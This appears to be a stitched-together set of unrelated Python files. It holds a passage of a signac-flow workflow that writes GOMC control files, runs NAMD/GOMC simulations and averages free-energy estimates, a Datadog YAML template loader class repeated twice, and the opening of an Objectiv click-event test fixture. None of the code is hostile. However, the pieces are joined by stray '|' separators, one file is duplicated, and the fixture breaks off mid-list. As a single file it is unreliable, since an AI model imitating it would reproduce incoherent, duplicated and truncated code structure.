                "LambdaVDW": list(job.doc.LambdaVDW_list),
                # "LambdaCoulomb": None,
            },
        )
        print("#**********************")
        print("Completed: equilb NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
        # ******************************************************
        # equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (end)
        # Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
        # so the Charmm object only needs created 1 time.
        # ******************************************************
        # ******************************************************
        # production NPT or GEMC-NVT - GOMC control file writing (start)
        # ******************************************************
        print("#**********************")
        print("Started: production NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
        # The production run restarts from the matching equilibration run's outputs.
        output_name_control_file_name = "{}_initial_state_{}".format(
            gomc_production_control_file_name_str, initial_state_sims_i
        )
        restart_control_file_name_str = "{}_initial_state_{}".format(
            gomc_equilb_design_ensemble_control_file_name_str, int(initial_state_sims_i)
        )
        job.doc.gomc_production_run_ensemble_dict.update(
            {
                initial_state_sims_i: {
                    "restart_control_file_name": restart_control_file_name_str,
                    "output_name_control_file_name": output_name_control_file_name,
                }
            }
        )
        # calc MC steps
        MC_steps = int(gomc_steps_lamda_production)
        EqSteps = 1000
        # output all data and calc frequency
        output_true_list_input = [
            True,
            int(gomc_output_data_every_X_steps),
        ]
        output_false_list_input = [
            False,
            int(gomc_output_data_every_X_steps),
        ]
        # MC move ratios (NVT has no volume moves; NPT matches the equilb run).
        if job.doc.solvent in ["TIP4", "TIP3"] \
                and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
            used_ensemble = job.doc.production_ensemble
            if job.doc.production_ensemble in ["NVT", "NPT"]:
                if job.doc.production_ensemble in ["NVT"]:
                    VolFreq = (0.00,)
                    MultiParticleFreq = (None,)
                    IntraSwapFreq = (0.0,)
                    CrankShaftFreq = (None,)
                    SwapFreq = (None,)
                    DisFreq = (0.4,)
                    RotFreq = (0.3,)
                    RegrowthFreq = (0.3,)
                elif job.doc.production_ensemble in ["NPT"]:
                    VolFreq = (0.01,)
                    MultiParticleFreq = (None,)
                    IntraSwapFreq = (0.0,)
                    CrankShaftFreq = (None,)
                    SwapFreq = (None,)
                    DisFreq = (0.39,)
                    RotFreq = (0.3,)
                    RegrowthFreq = (0.3,)
            else:
                raise ValueError(
                    "Moleules MC move ratios not listed for this solvent and solute or ensemble "
                    "in the GOMC control file writer."
                )
        # Restart files written by the GOMC equilibration run for this state.
        Coordinates_box_0 = "{}_BOX_0_restart.pdb".format(
            restart_control_file_name_str
        )
        Structure_box_0 = "{}_BOX_0_restart.psf".format(
            restart_control_file_name_str
        )
        binCoordinates_box_0 = "{}_BOX_0_restart.coor".format(
            restart_control_file_name_str
        )
        extendedSystem_box_0 = "{}_BOX_0_restart.xsc".format(
            restart_control_file_name_str
        )
        gomc_control.write_gomc_control_file(
            gomc_charmm_object_with_files,
            output_name_control_file_name,
            used_ensemble,
            MC_steps,
            production_temperature_K,
            ff_psf_pdb_file_directory=None,
            check_input_files_exist=False,
            Parameters="{}.inp".format(gomc_ff_filename_str),
            Restart=True,
            RestartCheckpoint=True,
            ExpertMode=False,
            Coordinates_box_0=Coordinates_box_0,
            Structure_box_0=Structure_box_0,
            binCoordinates_box_0=binCoordinates_box_0,
            extendedSystem_box_0=extendedSystem_box_0,
            binVelocities_box_0=None,
            Coordinates_box_1=None,
            Structure_box_1=None,
            binCoordinates_box_1=None,
            extendedSystem_box_1=None,
            binVelocities_box_1=None,
            input_variables_dict={
                "PRNG": seed_no,
                "Pressure": production_pressure_bar,
                "Ewald": use_ElectroStatics,
                "ElectroStatic": use_ElectroStatics,
                "VDWGeometricSigma": VDWGeometricSigma,
                "Rcut": job.doc.Rcut_ang,
                "Exclude": Exclude,
                "VolFreq": VolFreq[-1],
                "MultiParticleFreq": MultiParticleFreq[-1],
                "IntraSwapFreq": IntraSwapFreq[-1],
                "CrankShaftFreq": CrankShaftFreq[-1],
                "SwapFreq": SwapFreq[-1],
                "DisFreq": DisFreq[-1],
                "RotFreq": RotFreq[-1],
                "RegrowthFreq": RegrowthFreq[-1],
                "OutputName": output_name_control_file_name,
                "EqSteps": EqSteps,
                "PressureCalc": output_false_list_input,
                "RestartFreq": output_true_list_input,
                "CheckpointFreq": output_true_list_input,
                "ConsoleFreq": output_true_list_input,
                "BlockAverageFreq": output_true_list_input,
                "HistogramFreq": output_false_list_input,
                "CoordinatesFreq": output_false_list_input,
                "DCDFreq": output_true_list_input,
                "Potential": cutoff_style,
                "LRC": True,
                "RcutLow": 0,
                "CBMC_First": 12,
                "CBMC_Nth": 10,
                "CBMC_Ang": 50,
                "CBMC_Dih": 50,
                "FreeEnergyCalc": FreeEnergyCalc,
                "MoleculeType": MoleculeType,
                "InitialState": initial_state_sims_i,
                "LambdaVDW": list(job.doc.LambdaVDW_list),
                # "LambdaCoulomb": None,
            },
        )
        print("#**********************")
        print("Completed: production NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (start)
# ******************************************************
# ******************************************************
@Project.pre(mosdef_input_written)
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_3a_output_namd_equilb_NPT_started)
@Project.post(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.operation.with_directives(
    {
        "np": lambda job: job.doc.namd_node_ncpu,
        "ngpu": lambda job: job.doc.namd_node_ngpu,
        "memory": memory_needed,
        "walltime": walltime_namd_hr,
    }
)
@flow.with_job
@flow.cmd
def run_namd_equilb_NPT_gomc_command(job):
    """Run the namd_equilb_NPT simulation."""
    # Banner so the NAMD launch is easy to spot in the scheduler logs.
    print("#**********************")
    print("# Started the run_namd_equilb_NPT_gomc_command.")
    print("#**********************")
    print(f"Running simulation job id {job}")
    # Assemble: <binary dir>/<namd binary> +p<ncpu> <conf>.conf > out_<conf>.dat
    namd_exec_name = str(job.doc.namd_equilb_NPT_gomc_binary_file)
    ncpu_str = str(job.doc.namd_node_ncpu)
    conf_name = str(namd_equilb_NPT_control_file_name_str)
    run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
        str(namd_binary_path),
        namd_exec_name,
        ncpu_str,
        conf_name,
        conf_name,
    )
    print('namd run_command = ' + run_command)
    # @flow.cmd executes the returned shell command.
    return run_command
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
# Register one GOMC equilibration operation per lambda initial state; the
# keyword-only default binds the current loop value into each closure.
for initial_state_j in range(0, number_of_lambda_spacing_including_zero_int):
    @Project.pre(part_2a_namd_equilb_NPT_control_file_written)
    @Project.pre(part_4a_job_namd_equilb_NPT_completed_properly)
    @Project.post(part_3b_output_gomc_equilb_design_ensemble_started)
    @Project.post(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
    @Project.operation.with_directives(
        {
            "np": lambda job: job.doc.gomc_ncpu,
            "ngpu": lambda job: job.doc.gomc_ngpu,
            "memory": memory_needed,
            "walltime": walltime_gomc_equilbrium_hr,
        },
        name=f"gomc_equilb_design_ensemble_initial_state_{initial_state_j}"
    )
    @flow.with_job
    @flow.cmd
    def run_equilb_run_gomc_command(job, *, initial_state_j=initial_state_j):
        """Run the gomc_equilb_run_ensemble simulation."""
        # Control file registered for this lambda state by the builder operation
        # (signac stores the dict keys as strings).
        state_entry = job.doc.gomc_equilb_design_ensemble_dict[str(initial_state_j)]
        control_file_name_str = state_entry["output_name_control_file_name"]
        print(f"Running simulation job id {job}")
        gomc_exec_name = str(job.doc.gomc_equilb_design_ensemble_gomc_binary_file)
        ncpu_str = str(job.doc.gomc_ncpu)
        conf_name = str(control_file_name_str)
        run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
            str(gomc_binary_path),
            gomc_exec_name,
            ncpu_str,
            conf_name,
            conf_name,
        )
        print('gomc equilbrium_run run_command = ' + run_command)
        return run_command
# *****************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
# Register one GOMC production operation per lambda initial state; the
# keyword-only default bakes the loop value into each generated function.
for initial_state_i in range(0, number_of_lambda_spacing_including_zero_int):
    @Project.pre(part_2c_gomc_production_control_file_written)
    @Project.pre(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
    @Project.post(part_part_3c_output_gomc_production_run_started)
    @Project.post(part_4c_job_production_run_completed_properly)
    @Project.operation.with_directives(
        {
            "np": lambda job: job.doc.gomc_ncpu,
            "ngpu": lambda job: job.doc.gomc_ngpu,
            "memory": memory_needed,
            "walltime": walltime_gomc_production_hr,
        },
        name=f"gomc_production_ensemble_initial_state_{initial_state_i}"
    )
    @flow.with_job
    @flow.cmd
    def run_production_run_gomc_command(job, *, initial_state_i=initial_state_i):
        """Run the gomc_production_ensemble simulation."""
        # Control file registered for this lambda state by the builder operation
        # (signac stores the dict keys as strings).
        state_entry = job.doc.gomc_production_run_ensemble_dict[str(initial_state_i)]
        control_file_name_str = state_entry["output_name_control_file_name"]
        print(f"Running simulation job id {job}")
        gomc_exec_name = str(job.doc.gomc_production_ensemble_gomc_binary_file)
        ncpu_str = str(job.doc.gomc_ncpu)
        conf_name = str(control_file_name_str)
        run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
            str(gomc_binary_path),
            gomc_exec_name,
            ncpu_str,
            conf_name,
            conf_name,
        )
        print('gomc production run_command = ' + run_command)
        return run_command
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (start)
# ******************************************************
# ******************************************************
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_gomc_analysis_hr,
    }
)
@FlowProject.pre(
    lambda *jobs: all(
        part_4c_job_production_run_completed_properly(job)
        for job in jobs
    )
)
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.post(part_5a_analysis_individual_simulation_averages_completed)
@flow.with_job
def part_5a_analysis_individual_simulation_averages(*jobs):
    """Compute each job's free-energy estimates (MBAR, TI, and BAR) from
    the GOMC free-energy output files and write them to a per-job text file.

    Also removes the across-replicate summary file, since it becomes stale
    once any per-job data is (re)generated.
    """
    # remove the total averaged replicate data and all analysis data after this,
    # as it is no longer valid when adding more simulations
    if os.path.isfile(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'):
        os.remove(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}')
    # column titles for the per-job output file
    output_column_temp_title = 'temp_K'
    output_column_solute_title = 'solute'
    output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol'
    output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol'
    output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol'
    output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol'
    output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol'
    output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol'
    # get the averages from each individual simulation and write the csv's.
    for job in jobs:
        files = []
        k_b = 1.9872036E-3  # Boltzmann constant, kcal/mol/K
        temperature = job.sp.production_temperature_K
        k_b_T = temperature * k_b
        # one free-energy output file per lambda initial state
        for initial_state_iter in range(0, number_of_lambda_spacing_including_zero_int):
            reading_filename_box_0_iter = (
                f'Free_Energy_BOX_0_{gomc_production_control_file_name_str}_'
                f'initial_state_{initial_state_iter}.dat'
            )
            files.append(reading_filename_box_0_iter)
        # for TI estimator
        dHdl = pd.concat([extract_dHdl(job.fn(f), T=temperature) for f in files])
        ti = TI().fit(dHdl)
        delta_ti, delta_std_ti = get_delta_TI_or_MBAR(ti, k_b_T)
        # for MBAR estimator
        u_nk = pd.concat([extract_u_nk(job.fn(f), T=temperature) for f in files])
        mbar = MBAR().fit(u_nk)
        delta_mbar, delta_std_mbar = get_delta_TI_or_MBAR(mbar, k_b_T)
        # for BAR estimator (fits the same u_nk data as MBAR)
        bar = BAR().fit(u_nk)
        delta_bar, delta_std_bar = get_delta_BAR(bar, k_b_T)
        # write the data out in each job; the context manager guarantees the
        # handle is closed (it was previously opened and never closed)
        with open(job.fn(output_replicate_txt_file_name_box_0), "w") as box_0_replicate_data_txt_file:
            box_0_replicate_data_txt_file.write(
                f"{output_column_temp_title: <30} "
                f"{output_column_solute_title: <30} "
                f"{output_column_dFE_MBAR_title: <30} "
                f"{output_column_dFE_MBAR_std_title: <30} "
                f"{output_column_dFE_TI_title: <30} "
                f"{output_column_dFE_TI_std_title: <30} "
                f"{output_column_dFE_BAR_title: <30} "
                f"{output_column_dFE_BAR_std_title: <30} "
                f" \n"
            )
            box_0_replicate_data_txt_file.write(
                f"{job.sp.production_temperature_K: <30} "
                f"{job.sp.solute: <30} "
                f"{delta_mbar: <30} "
                f"{delta_std_mbar: <30} "
                f"{delta_ti: <30} "
                f"{delta_std_ti: <30} "
                f"{delta_bar: <30} "
                f"{delta_std_bar: <30} "
                f" \n"
            )
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (start)
# ******************************************************
# ******************************************************
@aggregator.groupby(key=statepoint_without_replica,
                    sort_by="production_temperature_K",
                    sort_ascending=True
                    )
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_gomc_analysis_hr,
    }
)
@Project.pre(lambda *jobs: all(part_5a_analysis_individual_simulation_averages_completed(j)
                               for j in jobs[0]._project))
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.post(part_5b_analysis_replica_averages_completed)
def part_5b_analysis_replica_averages(*jobs):
    """Average the per-job free-energy results across replicates and append
    one summary row (mean and sample std. dev. per estimator) to the
    project-level analysis text file.
    """
    # ***************************************************
    # create the required lists and file labels for the replicates (start)
    # ***************************************************
    # output and labels (column titles of the summary file)
    output_column_temp_title = 'temp_K'
    output_column_temp_std_title = 'temp_std_K'
    output_column_solute_title = 'solute'
    output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol'
    output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol'
    output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol'
    output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol'
    output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol'
    output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol'
    # per-replicate accumulators
    temp_repilcate_list = []
    solute_repilcate_list = []
    delta_MBAR_repilcate_box_0_list = []
    delta_TI_repilcate_box_0_list = []
    delta_BAR_repilcate_box_0_list = []
    # BUG FIX: the TI-title field used the invalid format spec '<3 0'
    # (raised "Invalid format specifier" at runtime); now '<30' like the rest.
    output_txt_file_header = f"{output_column_temp_title: <30} " \
                             f"{output_column_temp_std_title: <30} " \
                             f"{output_column_solute_title: <30} " \
                             f"{output_column_dFE_MBAR_title: <30} " \
                             f"{output_column_dFE_MBAR_std_title: <30} " \
                             f"{output_column_dFE_TI_title: <30} " \
                             f"{output_column_dFE_TI_std_title: <30} " \
                             f"{output_column_dFE_BAR_title: <30} " \
                             f"{output_column_dFE_BAR_std_title: <30} " \
                             f"\n"
    write_file_path_and_name_box_0 = f'analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'
    # append to an existing summary file; otherwise create it and write the header
    append_to_existing_file = os.path.isfile(write_file_path_and_name_box_0)
    box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "a" if append_to_existing_file else "w")
    if not append_to_existing_file:
        box_box_0_data_txt_file.write(output_txt_file_header)
    # ***************************************************
    # create the required lists and file labels for the replicates (end)
    # ***************************************************
    for job in jobs:
        # *************************
        # drawing in data from single file and extracting specific rows from box 0 (start)
        # *************************
        reading_file_box_box_0 = job.fn(output_replicate_txt_file_name_box_0)
        # whitespace-delimited columns written by part_5a (raw string avoids the
        # invalid-escape warning the old '\s+' literal produced)
        data_box_box_0 = pd.read_csv(reading_file_box_box_0, sep=r'\s+', header=0, na_values='NaN', index_col=False)
        data_box_box_0 = pd.DataFrame(data_box_box_0)
        # each per-job file holds exactly one data row -> take index 0
        temp_repilcate_list.append(data_box_box_0.loc[:, output_column_temp_title][0])
        solute_repilcate_list.append(data_box_box_0.loc[:, output_column_solute_title][0])
        delta_MBAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_MBAR_title][0])
        delta_TI_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_TI_title][0])
        delta_BAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_BAR_title][0])
        # *************************
        # drawing in data from single file and extracting specific rows from box 0 (end)
        # *************************
    # *************************
    # get the replica means and std.devs (start); ddof=1 -> sample std. dev.
    # *************************
    temp_mean = np.mean(temp_repilcate_list)
    temp_std = np.std(temp_repilcate_list, ddof=1)
    solute_iter = solute_repilcate_list[0]
    delta_MBAR_mean_box_box_0 = np.mean(delta_MBAR_repilcate_box_0_list)
    delta_TI_mean_box_box_0 = np.mean(delta_TI_repilcate_box_0_list)
    delta_BAR_mean_box_box_0 = np.mean(delta_BAR_repilcate_box_0_list)
    delta_std_MBAR_mean_box_box_0 = np.std(delta_MBAR_repilcate_box_0_list, ddof=1)
    delta_std_TI_mean_box_box_0 = np.std(delta_TI_repilcate_box_0_list, ddof=1)
    delta_std_BAR_mean_box_box_0 = np.std(delta_BAR_repilcate_box_0_list, ddof=1)
    # *************************
    # get the replica means and std.devs (end)
    # *************************
    # ************************************
    # write the analysis data files for the liquid and vapor boxes (start)
    # ************************************
    box_box_0_data_txt_file.write(
        f"{temp_mean: <30} "
        f"{temp_std: <30} "
        f"{solute_iter: <30} "
        f"{delta_MBAR_mean_box_box_0: <30} "
        f"{delta_std_MBAR_mean_box_box_0: <30} "
        f"{delta_TI_mean_box_box_0: <30} "
        f"{delta_std_TI_mean_box_box_0: <30} "
        f"{delta_BAR_mean_box_box_0: <30} "
        f"{delta_std_BAR_mean_box_box_0: <30} "
        f" \n"
    )
    # close explicitly so the summary row is flushed (the handle was
    # previously never closed)
    box_box_0_data_txt_file.close()
    # ************************************
    # write the analysis data files for the liquid and vapor boxes (end)
    # ************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# signac end code (start)
# ******************************************************
# ******************************************************
if __name__ == "__main__":
    # Entry point: hand control to signac-flow's CLI for this project.
    Project().main()
# ******************************************************
# ******************************************************
# signac end code (end)
# ******************************************************
# ******************************************************
|
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from copy import deepcopy
import yaml
from ...utils import file_exists, path_join, read_file
# Template files may use either YAML extension; candidates are tried in this order.
VALID_EXTENSIONS = ('yaml', 'yml')
class BaseTemplate(object):
    """Loads YAML template files from a set of search paths, caches the parsed
    data, and resolves dotted branch selectors into sub-documents.

    FIX: the error-message f-strings nested the same quote character inside
    the replacement fields (e.g. ``f"...{"/".join(...)}..."``), which is a
    syntax error on every Python version before 3.12 (PEP 701); they now use
    single-quoted separators inside double-quoted f-strings.
    """

    # Override in subclass with path to templates
    TEMPLATES_DIR = None

    def __init__(self, paths=None):
        """Build the template search path: caller-supplied paths first (so
        they take precedence), then the subclass's TEMPLATES_DIR."""
        if self.TEMPLATES_DIR is None:
            raise NotImplementedError('Cannot be instantiated directly, subclass and override TEMPLATES_DIR')
        # template_path -> parsed YAML data (cached across load() calls)
        self.templates = {}
        self.paths = []
        if paths:
            self.paths.extend(paths)
        self.paths.append(self.TEMPLATES_DIR)

    def load(self, template):
        """Load a template reference like ``dir/file.branch.sub`` and return a
        deep copy of the selected branch.

        The part after the final ``/`` is split on ``.``: its first element is
        the file name, the rest are nested selectors (dict keys, or the
        ``name`` value of an item in a list). Raises ValueError if the file
        or any selector cannot be resolved.
        """
        path_parts = template.split('/')
        branches = path_parts.pop().split('.')
        path_parts.append(branches.pop(0))
        # candidate files: every search path x every valid extension, in order
        possible_template_paths = (
            f'{path_join(path, *path_parts)}.{extension}' for path in self.paths for extension in VALID_EXTENSIONS
        )
        for template_path in possible_template_paths:
            if file_exists(template_path):
                break
        else:
            raise ValueError(f"Template `{'/'.join(path_parts)}` does not exist")
        if template_path in self.templates:
            data = self.templates[template_path]
        else:
            try:
                data = yaml.safe_load(read_file(template_path))
            except Exception as e:
                raise ValueError(f'Unable to parse template `{template_path}`: {e}')
            self.templates[template_path] = data
        # deep copy so callers can mutate the result without poisoning the cache
        data = deepcopy(data)
        for i, branch in enumerate(branches):
            if isinstance(data, dict):
                if branch in data:
                    data = data[branch]
                else:
                    raise ValueError(f"Template `{'/'.join(path_parts)}` has no element `{'.'.join(branches[:i + 1])}`")
            elif isinstance(data, list):
                # in a list, a branch selects the item whose `name` matches
                for item in data:
                    if isinstance(item, dict) and item.get('name') == branch:
                        data = item
                        break
                else:
                    raise ValueError(
                        'Template `{}` has no named element `{}`'.format(
                            '/'.join(path_parts), '.'.join(branches[: i + 1])
                        )
                    )
            else:
                raise ValueError(
                    'Template `{}.{}` does not refer to a mapping, rather it is type `{}`'.format(
                        '/'.join(path_parts), '.'.join(branches[:i]), type(data).__name__
                    )
                )
        return data

    @staticmethod
    def apply_overrides(template, overrides):
        """Apply dotted-path overrides to `template` in place.

        Successfully applied overrides are removed from `overrides`; a list of
        error strings is returned for the ones that could not be applied.
        """
        errors = []
        for override, value in sorted(overrides.items()):
            root = template
            override_keys = override.split('.')
            final_key = override_keys.pop()
            intermediate_error = ''
            # Iterate through all but the last key, attempting to find a dictionary at every step
            for i, key in enumerate(override_keys):
                if isinstance(root, dict):
                    # the first key may simply restate the root's own `name`
                    if i == 0 and root.get('name') == key:
                        continue
                    if key in root:
                        root = root[key]
                    else:
                        intermediate_error = (
                            f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
                        )
                        break
                elif isinstance(root, list):
                    for item in root:
                        if isinstance(item, dict) and item.get('name') == key:
                            root = item
                            break
                    else:
                        intermediate_error = (
                            f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
                        )
                        break
                else:
                    intermediate_error = (
                        f"Template override `{'.'.join(override_keys[:i])}` does not refer to a mapping"
                    )
                    break
            if intermediate_error:
                errors.append(intermediate_error)
                continue
            # Force assign the desired value to the final key
            if isinstance(root, dict):
                root[final_key] = value
            elif isinstance(root, list):
                # in a list, replace the whole item whose `name` matches
                for i, item in enumerate(root):
                    if isinstance(item, dict) and item.get('name') == final_key:
                        root[i] = value
                        break
                else:
                    intermediate_error = 'Template override has no named mapping `{}`'.format(
                        '.'.join(override_keys) if override_keys else override
                    )
            else:
                intermediate_error = 'Template override `{}` does not refer to a mapping'.format(
                    '.'.join(override_keys) if override_keys else override
                )
            if intermediate_error:
                errors.append(intermediate_error)
                continue
            overrides.pop(override)
        return errors
| # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from copy import deepcopy
import yaml
from ...utils import file_exists, path_join, read_file
VALID_EXTENSIONS = ('yaml', 'yml')
class BaseTemplate(object):
    """Loads YAML template files from a set of search paths, caches the parsed
    data, and resolves dotted branch selectors into sub-documents."""

    # Override in subclass with path to templates
    TEMPLATES_DIR = None

    def __init__(self, paths=None):
        """Build the template search path: caller-supplied paths first (so
        they take precedence), then the subclass's TEMPLATES_DIR."""
        if self.TEMPLATES_DIR is None:
            raise NotImplementedError('Cannot be instantiated directly, subclass and override TEMPLATES_DIR')
        # template_path -> parsed YAML data (cached across load() calls)
        self.templates = {}
        self.paths = []
        if paths:
            self.paths.extend(paths)
        self.paths.append(self.TEMPLATES_DIR)

    def load(self, template):
        """Load a template reference like ``dir/file.branch.sub`` and return a
        deep copy of the selected branch.

        The part after the final ``/`` is split on ``.``: its first element is
        the file name, the rest are nested selectors (dict keys, or the
        ``name`` value of an item in a list). Raises ValueError if the file
        or any selector cannot be resolved.
        """
        path_parts = template.split('/')
        branches = path_parts.pop().split('.')
        path_parts.append(branches.pop(0))
        # candidate files: every search path x every valid extension, in order
        possible_template_paths = (
            f'{path_join(path, *path_parts)}.{extension}' for path in self.paths for extension in VALID_EXTENSIONS
        )
        # for/else: runs the else only when no candidate file exists
        for template_path in possible_template_paths:
            if file_exists(template_path):
                break
        else:
            raise ValueError(f"Template `{'/'.join(path_parts)}` does not exist")
        if template_path in self.templates:
            data = self.templates[template_path]
        else:
            try:
                data = yaml.safe_load(read_file(template_path))
            except Exception as e:
                raise ValueError(f'Unable to parse template `{template_path}`: {e}')
            self.templates[template_path] = data
        # deep copy so callers can mutate the result without poisoning the cache
        data = deepcopy(data)
        for i, branch in enumerate(branches):
            if isinstance(data, dict):
                if branch in data:
                    data = data[branch]
                else:
                    raise ValueError(f"Template `{'/'.join(path_parts)}` has no element `{'.'.join(branches[:i + 1])}`")
            elif isinstance(data, list):
                # in a list, a branch selects the item whose `name` matches
                for item in data:
                    if isinstance(item, dict) and item.get('name') == branch:
                        data = item
                        break
                else:
                    raise ValueError(
                        'Template `{}` has no named element `{}`'.format(
                            '/'.join(path_parts), '.'.join(branches[: i + 1])
                        )
                    )
            else:
                raise ValueError(
                    'Template `{}.{}` does not refer to a mapping, rather it is type `{}`'.format(
                        '/'.join(path_parts), '.'.join(branches[:i]), type(data).__name__
                    )
                )
        return data

    @staticmethod
    def apply_overrides(template, overrides):
        """Apply dotted-path overrides to `template` in place.

        Successfully applied overrides are removed from `overrides`; a list of
        error strings is returned for the ones that could not be applied.
        """
        errors = []
        for override, value in sorted(overrides.items()):
            root = template
            override_keys = override.split('.')
            final_key = override_keys.pop()
            intermediate_error = ''
            # Iterate through all but the last key, attempting to find a dictionary at every step
            for i, key in enumerate(override_keys):
                if isinstance(root, dict):
                    # the first key may simply restate the root's own `name`
                    if i == 0 and root.get('name') == key:
                        continue
                    if key in root:
                        root = root[key]
                    else:
                        intermediate_error = (
                            f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
                        )
                        break
                elif isinstance(root, list):
                    for item in root:
                        if isinstance(item, dict) and item.get('name') == key:
                            root = item
                            break
                    else:
                        intermediate_error = (
                            f"Template override `{'.'.join(override_keys[:i])}` has no named mapping `{key}`"
                        )
                        break
                else:
                    intermediate_error = (
                        f"Template override `{'.'.join(override_keys[:i])}` does not refer to a mapping"
                    )
                    break
            if intermediate_error:
                errors.append(intermediate_error)
                continue
            # Force assign the desired value to the final key
            if isinstance(root, dict):
                root[final_key] = value
            elif isinstance(root, list):
                # in a list, replace the whole item whose `name` matches
                for i, item in enumerate(root):
                    if isinstance(item, dict) and item.get('name') == final_key:
                        root[i] = value
                        break
                else:
                    intermediate_error = 'Template override has no named mapping `{}`'.format(
                        '.'.join(override_keys) if override_keys else override
                    )
            else:
                intermediate_error = 'Template override `{}` does not refer to a mapping'.format(
                    '.'.join(override_keys) if override_keys else override
                )
            if intermediate_error:
                errors.append(intermediate_error)
                continue
            overrides.pop(override)
        return errors
|
# Test fixture: sample Objectiv tracker events. Each row is a tuple of
# (event_id, day, moment, cookie_id, value), where `value` is the raw JSON
# payload of a ClickEvent (location_stack + global_contexts).
TEST_DATA_OBJECTIV = [
    ('12b55ed5-4295-4fc1-bf1f-88d64d1ac301','2021-11-30','2021-11-30 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "GitHub", "text": "GitHub", "href": "https://github.com/objectiv", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "729c84f9-91d0-4f9f-be58-5cfb2d8130e4", "time": 1636476263115, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
